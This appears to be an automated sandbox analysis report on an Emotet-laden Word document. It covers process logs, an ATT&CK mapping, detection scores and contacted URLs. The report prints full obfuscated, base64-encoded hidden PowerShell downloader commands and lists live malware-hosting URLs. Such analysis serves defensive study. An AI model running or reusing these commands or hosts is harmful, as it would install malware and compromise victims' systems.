AGcAJwArACcAMAA0ACcAKwAoACcAYwBjACcAKwAnAGcAJwApACkAOwAkAEUANQBwAGEAbQA0AGUAPQAoACcAVwBpACcAKwAoACcAMAAnACsAJwA4AGoAJwApACsAJwBhAHkAJwApADsAJABUAHAAZAB1AGUAMwAyAD0AJABIAE8ATQBFACsAKAAoACgAJwBNAFIAUABZACcAKwAnADUANQAnACkAKwAoACcAOQBqACcAKwAnAHMAJwApACsAJwB2ACcAKwAnAE0AJwArACgAJwBSACcAKwAnAFAASQAnACkAKwAnAGUAJwArACgAJwB3AGYAbQAnACsAJwB5ADMAJwApACsAKAAnAE0AUgAnACsAJwBQACcAKQApAC4AIgBSAGUAYABQAEwAYQBDAEUAIgAoACgAJwBNACcAKwAnAFIAUAAnACkALAAnAFwAJwApACkAKwAkAFEAbwBjAHkAXwBiAGcAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFIANgB1AHQAdgB5AGwAPQAoACgAJwBHACcAKwAnAHAAcgAnACkAKwAoACcAcwAnACsAJwA3ADkAJwApACsAJwBqACcAKQA7ACQAWgAxAGYAbQB2AHEAaAA9AE4AYABlAGAAdwAtAE8AQgBKAGUAYABDAFQAIABOAEUAVAAuAHcARQBCAGMAbABJAGUATgB0ADsAJABOAHkANABtAG4AdgB4AD0AKAAoACcAaAAnACsAKAAoACcAdAAnACsAJwB0AHAAOgBxAHEAKQAoACcAKQApACsAKAAoACcAcwAnACsAJwAyACkAKABxAHEAJwApACkAKwAnACkAJwArACgAKAAnACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoAG8AcAAnACkAKQArACgAJwBoACcAKwAnAGUAbABpACcAKQArACcAYQAnACsAKAAnAHMAYgAnACsAJwByAGUAJwArACcAdwBlAHIAeQAnACsAJwAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACcAcQAnACsAJwBxACcAKwAoACgAJwApACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAcAAtA
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAYwBWAE4AZwBBAFMAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0ARgAgACcAWQBTAFQAZQBNAC4ASQAnACwAJwBTACcALAAnAFIAeQAnACwAJwBPAC4ARABpAHIARQBDAFQAbwAnACkAOwAgACAAIABzAGUAdAAtAEkAVABFAE0AIAAoACIAdgBhAHIAaQBhAEIAbABlACIAKwAiADoAbAA2AFUAIgArACIAWQBIACIAKwAiAE4AIgApACAAIAAoAFsAVABZAHAAZQBdACgAIgB7ADUAfQB7ADAAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADEAfQAiAC0ARgAgACcAWQAnACwAJwBHAGUAcgAnACwAJwBFAFAAbwBJACcALAAnAE4AdABtACcALAAnAFQARQBNAC4ATgBlAHQALgBzAGUAJwAsACcAcwAnACwAJwBBAG4AQQAnACwAJwBzACcALAAnAFIAdgBJAGMAJwApACkAOwAgACQAWABkAHoAXwB0AF8AaQA9ACgAJwBBAHUAJwArACgAJwB6ADAAegAnACsAJwBxAHgAJwApACkAOwAkAFAAaQBpADgAbwBlAG4APQAkAEIAMAB4AGsAMAA0AHIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFYAYQBsADYAcQBhAHgAOwAkAEwAcgBfAGwAcQBuAHcAPQAoACgAJwBQAGsAJwArACcAOQAnACkAKwAoACcAMQAnACsAJwA1AHcAJwApACsAJwBvACcAKQA7ACAAKAAgACAAaQBUAEUATQAgAHYAYQByAEkAQQBCAGwARQA6AEMAdgBuAGcAQQBTACkALgB2AEEAbABVAEUAOgA6ACIAQwBSAEUAQQBUAGUAYABkAGkAYABSAGUAQwB0AE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AWQAnACsAJwA1ACcAKwAnADUAOQBqAHMAdgB7ADAAfQBJAGUAdwBmAG0AeQAzACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBGAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAE0AXwBkAG4AYgBzADQAPQAoACcAUQAnACsAKAAnAHUAJwArACcAZwBzACcAKQArACgAJwB5AG8AJwArACcAZAAnACkAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAGUAbQAgACgAIgB2AGEAUgBJAGEAQgBMAGUAIgArACIAOgBsADYAdQAiACsAIgBZAEgAIgArACIAbgAiACkAKQAuAHYAYQBMAHUARQA6ADoAIgBzAEUAQwB1AFIAYABJAFQAYAB5AHAAcgBPAFQAYABvAGMATwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAdABoAHEAbQBnAD0AKAAnAEoAJwArACgAJwB6AHoAJwArACcAegA2ACcAKwAnADIAbQAnACkAKQA7ACQAUQBvAGMAeQBfAGIAZwAgAD0AIAAoACgAJwBQAHAAJwArACcAbgBxACcAKQArACcAOQBqACcAKQA7ACQAWgB5ADcAegA3AGgAZAA9ACgAJwBGAGcAJwArACcAMAA0ACcAKwAoACcAYwBjACcAKwAnAGcAJwApACkAOwAkAEUANQBwAGEAbQA0AGUAPQAoACcAVwBpACcAKwAoACcAMAAnACsAJwA4AGoAJwApACsAJwBhAHkAJwApADsAJABUAHAAZAB1AGUAMwAyAD0AJABIAE8ATQBFACsAKAAoACgAJwBNAFIAUABZACcAKwAnADUANQAnACkAKwAoACcAOQBqACcAKwAnAHMAJwApACsAJwB2ACcAKwAnAE0AJwArACgAJwBSACcAKwAnAFAASQAnACkAKwAnAGUAJwArACgAJwB3AGYAbQAnACsAJwB5ADMAJwApACsAKAAnAE0AUgAnACsAJwBQACcAKQApAC4AIgBSAGUAYABQAEwAYQBDAEUAIgAoACgAJwBNACcAKwAnAFIAUAAnACkALAAnAFwAJwApACkAKwAkAFEAbwBjAHkAXwBiAGcAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFIANgB1AHQAdgB5AGwAPQAoACgAJwBHACcAKwAnAHAAcgAnACkAKwAoACcAcwAnACsAJwA3ADkAJwApACsAJwBqACcAKQA7ACQAWgAxAGYAbQB2AHEAaAA9AE4AYABlAGAAdwAtAE8AQgBKAGUAYABDAFQAIABOAEUAVAAuAHcARQBCAGMAbABJAGUATgB0ADsAJABOAHkANABtAG4AdgB4AD0AKAAoACcAaAAnACsAKAAoACcAdAAnACsAJwB0AHAAOgBxAHEAKQAoACcAKQApACsAKAAoACcAcwAnACsAJwAyACkAKABxAHEAJwApACkAKwAnACkAJwArACgAKAAnACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoAG8AcAAnACkAKQArACgAJwBoACcAKwAnAGUAbABpACcAKQArACcAYQAnACsAKAAnAHMAYgAnACsAJwByAGUAJwArACcAdwBlAHIAeQAnACsAJwAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACcAcQAnACsAJwBxACcAKwAoACgAJwApACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAcAAtACcAKQApACsAKAAnAGkAbgAnACsAJwBjACcAKQArACcAbAAnACsAKAAnAHUAJ
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAYwBWAE4AZwBBAFMAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0ARgAgACcAWQBTAFQAZQBNAC4ASQAnACwAJwBTACcALAAnAFIAeQAnACwAJwBPAC4ARABpAHIARQBDAFQAbwAnACkAOwAgACAAIABzAGUAdAAtAEkAVABFAE0AIAAoACIAdgBhAHIAaQBhAEIAbABlACIAKwAiADoAbAA2AFUAIgArACIAWQBIACIAKwAiAE4AIgApACAAIAAoAFsAVABZAHAAZQBdACgAIgB7ADUAfQB7ADAAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADEAfQAiAC0ARgAgACcAWQAnACwAJwBHAGUAcgAnACwAJwBFAFAAbwBJACcALAAnAE4AdABtACcALAAnAFQARQBNAC4ATgBlAHQALgBzAGUAJwAsACcAcwAnACwAJwBBAG4AQQAnACwAJwBzACcALAAnAFIAdgBJAGMAJwApACkAOwAgACQAWABkAHoAXwB0AF8AaQA9ACgAJwBBAHUAJwArACgAJwB6ADAAegAnACsAJwBxAHgAJwApACkAOwAkAFAAaQBpADgAbwBlAG4APQAkAEIAMAB4AGsAMAA0AHIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFYAYQBsADYAcQBhAHgAOwAkAEwAcgBfAGwAcQBuAHcAPQAoACgAJwBQAGsAJwArACcAOQAnACkAKwAoACcAMQAnACsAJwA1AHcAJwApACsAJwBvACcAKQA7ACAAKAAgACAAaQBUAEUATQAgAHYAYQByAEkAQQBCAGwARQA6AEMAdgBuAGcAQQBTACkALgB2AEEAbABVAEUAOgA6ACIAQwBSAEUAQQBUAGUAYABkAGkAYABSAGUAQwB0AE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AWQAnACsAJwA1ACcAKwAnADUAOQBqAHMAdgB7ADAAfQBJAGUAdwBmAG0AeQAzACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBGAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAE0AXwBkAG4AYgBzADQAPQAoACcAUQAnACsAKAAnAHUAJwArACcAZwBzACcAKQArACgAJwB5AG8AJwArACcAZAAnACkAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAGUAbQAgACgAIgB2AGEAUgBJAGEAQgBMAGUAIgArACIAOgBsADYAdQAiACsAIgBZAEgAIgArACIAbgAiACkAKQAuAHYAYQBMAHUARQA6ADoAIgBzAEUAQwB1AFIAYABJAFQAYAB5AHAAcgBPAFQAYABvAGMATwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAdABoAHEAbQBnAD0AKAAnAEoAJwArACgAJwB6AHoAJwArACcAegA2ACcAKwAnADIAbQAnACkAKQA7ACQAUQBvAGMAeQBfAGIAZwAgAD0AIAAoACgAJwBQAHAAJwArACcAbgBxACcAKQArACcAOQBqACcAKQA7ACQAWgB5ADcAegA3AGgAZAA9ACgAJwBGAGcAJwArACcAMAA0ACcAKwAoACcAYwBjACcAKwAnAGcAJwApACkAOwAkAEUANQBwAGEAbQA0AGUAPQAoACcAVwBpACcAKwAoACcAMAAnACsAJwA4AGoAJwApACsAJwBhAHkAJwApADsAJABUAHAAZAB1AGUAMwAyAD0AJABIAE8ATQBFACsAKAAoACgAJwBNAFIAUABZACcAKwAnADUANQAnACkAKwAoACcAOQBqACcAKwAnAHMAJwApACsAJwB2ACcAKwAnAE0AJwArACgAJwBSACcAKwAnAFAASQAnACkAKwAnAGUAJwArACgAJwB3AGYAbQAnACsAJwB5ADMAJwApACsAKAAnAE0AUgAnACsAJwBQACcAKQApAC4AIgBSAGUAYABQAEwAYQBDAEUAIgAoACgAJwBNACcAKwAnAFIAUAAnACkALAAnAFwAJwApACkAKwAkAFEAbwBjAHkAXwBiAGcAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFIANgB1AHQAdgB5AGwAPQAoACgAJwBHACcAKwAnAHAAcgAnACkAKwAoACcAcwAnACsAJwA3ADkAJwApACsAJwBqACcAKQA7ACQAWgAxAGYAbQB2AHEAaAA9AE4AYABlAGAAdwAtAE8AQgBKAGUAYABDAFQAIABOAEUAVAAuAHcARQBCAGMAbABJAGUATgB0ADsAJABOAHkANABtAG4AdgB4AD0AKAAoACcAaAAnACsAKAAoACcAdAAnACsAJwB0AHAAOgBxAHEAKQAoACcAKQApACsAKAAoACcAcwAnACsAJwAyACkAKABxAHEAJwApACkAKwAnACkAJwArACgAKAAnACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoAG8AcAAnACkAKQArACgAJwBoACcAKwAnAGUAbABpACcAKQArACcAYQAnACsAKAAnAHMAYgAnACsAJwByAGUAJwArACcAdwBlAHIAeQAnACsAJwAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACcAcQAnACsAJwBxACcAKwAoACgAJwApACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAcAAtACcAKQApACsAKAAnAGkAbgAnACsAJwBjACcAKQArACcAbAAnACsAKAAnAHUAJJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection11Masquerading1OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsCommand and Scripting Interpreter11Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsScripting12Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion2Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
Cloud AccountsPowerShell3Network Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information2LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonScripting12Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information1DCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobExtra Window Memory Injection1Proc FilesystemSystem Information Discovery13Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Adjunto K_23165.doc70%VirustotalBrowse
Adjunto K_23165.doc57%MetadefenderBrowse
Adjunto K_23165.doc86%ReversingLabsDocument-Word.Trojan.Emotet

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
calltorepair.com9%VirustotalBrowse
giatot365.com8%VirustotalBrowse
opheliasbrewery.com14%VirustotalBrowse
xuanthinhshop.com10%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://xuanthinhshop.comx0%Avira URL Cloudsafe
http://tongdaihanoi.com/847346324234234/rpnvXm/?js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJK100%Avira URL Cloudmalware
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://giatot365.com/wp-content/uploads/2020/Sx/100%Avira URL Cloudmalware
https://www.calltorepair.com/wp-content/themes/thefox/style.css100%Avira URL Cloudphishing
https://www.calltorepair.com/wp-content/uploads/2021/01/light_logo-300x115.png100%Avira URL Cloudphishing
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://www.calltorepair.com/blog/100%Avira URL Cloudphishing
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://cps.letsencrypt.org00%URL Reputationsafe
http://cps.letsencrypt.org00%URL Reputationsafe
http://cps.letsencrypt.org00%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.calltorepair.com/project/world-business/100%Avira URL Cloudphishing
https://www.calltorepair.com/wp-content/themes/thefox/includes/Flexslider/flexslider.css100%Avira URL Cloudphishing
https://www.calltorepair.com/wp-content/themes/thefox/includes/zilla-likes/styles/zilla-likes.css100%Avira URL Cloudphishing
https://www.calltorepair.com/wp-content/themes/thefox/includes/prettyPhoto/css/prettyPhoto.css100%Avira URL Cloudphishing
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://www.calltorepair.com/wp-content/uploads/2021/01/light_logo.png100%Avira URL Cloudphishing
https://www.calltorepair.com/wp-json/100%Avira URL Cloudphishing
https://www.calltorepair.com/wp-content/uploads/2021/01/big_mob_logo-1.png100%Avira URL Cloudphishing
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
http://cherkashchanu.com/Z:/4ZE8/100%Avira URL Cloudmalware
https://www.calltorepair.com/wp-content/themes/thefox/js/html5.js100%Avira URL Cloudphishing
https://www.calltorepair.com/wp-content/plugins/revslider/public/assets/js/rs6.min.js100%Avira URL Cloudphishing
https://www.calltorepair.com/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.kreatu100%Avira URL Cloudphishing
https://www.calltorepair.com/wp-content/themes/thefox/css/animations.css100%Avira URL Cloudphishing
http://tongdaihanoi.com/847346324234234/rpnvXm/100%Avira URL Cloudmalware
https://www.calltorepair.com/project/luv-summer/100%Avira URL Cloudphishing
https://www.calltorepair.com/wp-content/plugins/LayerSlider/static/layerslider/js/greensock.js100%Avira URL Cloudphishing
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://www.calltorepair.com/wp-content/themes/thefox/css/thefox_js_composer.css100%Avira URL Cloudphishing
https://giatot365.com0%Avira URL Cloudsafe
https://giatot365.com/wp-content/uploads/20%Avira URL Cloudsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://www.calltorepair.com/wp-admin/admin-ajax.php100%Avira URL Cloudphishing
https://www.calltorepair.com/xmlrpc.php?rsd100%Avira URL Cloudphishing
https://staging.cortana.ai0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe
http://opheliasbrewery.com0%Avira URL Cloudsafe
https://www.calltorepair.com/about-us/100%Avira URL Cloudphishing
http://giatot365.com0%Avira URL Cloudsafe
https://www.calltorepair.com/wp-content/plugins/revslider/public/assets/css/rs6.css100%Avira URL Cloudphishing
https://www.calltorepair.com/wp-content/themes/thefox/style_end.css100%Avira URL Cloudphishing
https://www.calltorepair.com/wp-includes/css/dist/block-library/style.min.css100%Avira URL Cloudphishing
https://wus2.pagecontentsync.0%URL Reputationsafe
https://wus2.pagecontentsync.0%URL Reputationsafe
https://wus2.pagecontentsync.0%URL Reputationsafe
https://www.calltorepair.com/project/great-project/100%Avira URL Cloudphishing
https://cortana.ai/api0%URL Reputationsafe
https://cortana.ai/api0%URL Reputationsafe
https://cortana.ai/api0%URL Reputationsafe
http://cherkashchanu.com0%Avira URL Cloudsafe
http://servicios.semperti.com0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
calltorepair.com
107.180.2.185
truetrueunknown
giatot365.com
103.28.39.103
truetrueunknown
opheliasbrewery.com
35.209.212.48
truetrueunknown
xuanthinhshop.com
139.180.215.83
truetrueunknown
tongdaihanoi.com
151.106.5.169
truetrue
    		unknown
    cherkashchanu.com
    		185.104.45.33
    		truetrue
      		unknown
      servicios.semperti.com
      		unknown
      		unknowntrue
        		unknown
        www.calltorepair.com
        		unknown
        		unknowntrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://cherkashchanu.com/Z:/4ZE8/true
          • Avira URL Cloud: malware
          		unknown
          http://tongdaihanoi.com/847346324234234/rpnvXm/true
          • Avira URL Cloud: malware
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://shell.suite.office.com:1443EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
            		high
            https://autodiscover-s.outlook.com/EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
              		high
              https://xuanthinhshop.comxpowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://tongdaihanoi.com/847346324234234/rpnvXm/?js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKpowershell.exe, 00000005.00000002.340869537.0000019232CB2000.00000004.00000001.sdmp, Ppnq9j.dll.5.drtrue
              • Avira URL Cloud: malware
              		unknown
              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                		high
                https://cdn.entity.EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                  		high
                  https://rpsticket.partnerservices.getmicrosoftkey.comEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  https://lookup.onenote.com/lookup/geolocation/v1EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                    		high
                    https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                      		high
                      https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                        		high
                        https://api.aadrm.com/EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                          		high
                          https://api.microsoftstream.com/api/EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                            		high
                            https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=ImmersiveEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                              		high
                              https://cr.office.comEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                		high
                                https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.342905639.0000019242254000.00000004.00000001.sdmpfalse
                                  		high
                                  https://giatot365.com/wp-content/uploads/2020/Sx/powershell.exe, 00000005.00000002.340589263.0000019232B6E000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.338304590.0000019232406000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://www.calltorepair.com/wp-content/themes/thefox/style.csspowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: phishing
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.337858164.00000192321F1000.00000004.00000001.sdmpfalse
                                    		high
                                    https://www.calltorepair.com/wp-content/uploads/2021/01/light_logo-300x115.pngpowershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: phishing
                                    		unknown
                                    https://res.getmicrosoftkey.com/api/redemptioneventsEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://tasks.office.comEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                      		high
                                      https://officeci.azurewebsites.net/api/EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.calltorepair.com/blog/powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: phishing
                                      		unknown
                                      https://store.office.cn/addinstemplateEBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.338304590.0000019232406000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://cps.letsencrypt.org0powershell.exe, 00000005.00000002.338769822.0000019232712000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.338304590.0000019232406000.00000004.00000001.sdmpfalse
                                        		high
